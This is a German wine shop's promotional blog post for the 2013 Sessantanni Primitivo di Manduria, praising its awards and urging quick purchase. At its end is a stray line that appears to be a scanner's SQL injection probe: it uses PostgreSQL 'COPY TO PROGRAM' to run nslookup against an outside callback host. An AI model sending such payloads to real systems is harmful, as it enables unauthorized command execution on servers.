94P Sessantanni Primitivo di Manduria- die Legende ist zurück!

Der Sessantanni Primitivo di Manduria ist eine echte Legende. Die letzten Jahrgänge schlugen wie eine Bombe ein! Gold-Medaillen, Punkte im mittleren 90er Bereich und nicht zuletzt eine 3-Sterne-Höchstbewertung des Veronelli-Guides zeigen, was wir hier für einen Traum-Stoff in der Flasche haben.


Kein Wunder, dass uns auch der neue 2013er Jahrgang in den letzten Monaten förmlich aus den Händen gerissen wurde. Ratzfatz, waren die Regale leer und der Wein ausverkauft. Umso mehr freuen wir uns, Ihnen diesen traumhaften, roten Italiener endlich wieder bei anbieten zu können!

Heiß begehrt: Schnell sein lohnt sich!

Diese Gelegenheit sollte man sich nicht entgehen lassen und sich den heißbegehrten und hochprämierten 94P Sessantanni Primitivo di Manduria 2013 aus der Cantine San Marzano am besten so schnell wie möglich sichern!

blog_sessantanni-primitivo-di-manduria

  • testing';copy (select '') to program 'nslookup dns.sqli.55065.73502-9226.73502.c4a7e.1.bxss.me
  • testing